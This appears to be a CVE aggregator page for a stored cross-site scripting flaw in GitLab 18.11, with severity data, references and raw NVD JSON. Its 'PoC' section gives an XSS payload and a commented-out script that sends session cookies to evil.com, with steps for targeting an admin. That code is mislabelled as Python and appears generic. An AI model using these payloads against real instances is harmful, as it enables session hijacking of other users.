CVE-2026-6335

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.11 before 18.11.3 that under certain conditions could have allowed an authenticated user to execute arbitrary code in another user's browser session due to improper sanitization.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GitLab CE/EE 18.11

GitLab CE/EE 18.11.1

GitLab CE/EE 18.11.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC Concept for CVE-2026-6335
// Attacker injects this payload into a vulnerable field (e.g., Issue description)

// Simple Alert Payload to verify vulnerability
let maliciousPayload = '<img src=x onerror=alert(1)>';

// Advanced Payload to exfiltrate session cookies
// let stealCookie = '<script>fetch(\'https://evil.com/steal?c=\'+document.cookie)</script>';

// Usage:
// 1. Attacker logs in to GitLab.
// 2. Navigates to a feature where user input is reflected and stored (e.g., create an Issue).
// 3. Inputs the maliciousPayload into the description field.
// 4. Submits the form.
// 5. Victim (Admin) views the issue -> Code executes in Admin's browser.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6335
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6335
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6335/
[4] VulDB https://vuldb.com/cve/CVE-2026-6335
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/596760
[7] https://hackerone.com/reports/3673647

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6335", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:24.780", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.11 before 18.11.3 that under certain conditions could have allowed an authenticated user to execute arbitrary code in another user's browser session due to improper sanitization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/596760", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3673647", "source": "[email protected]"}]}}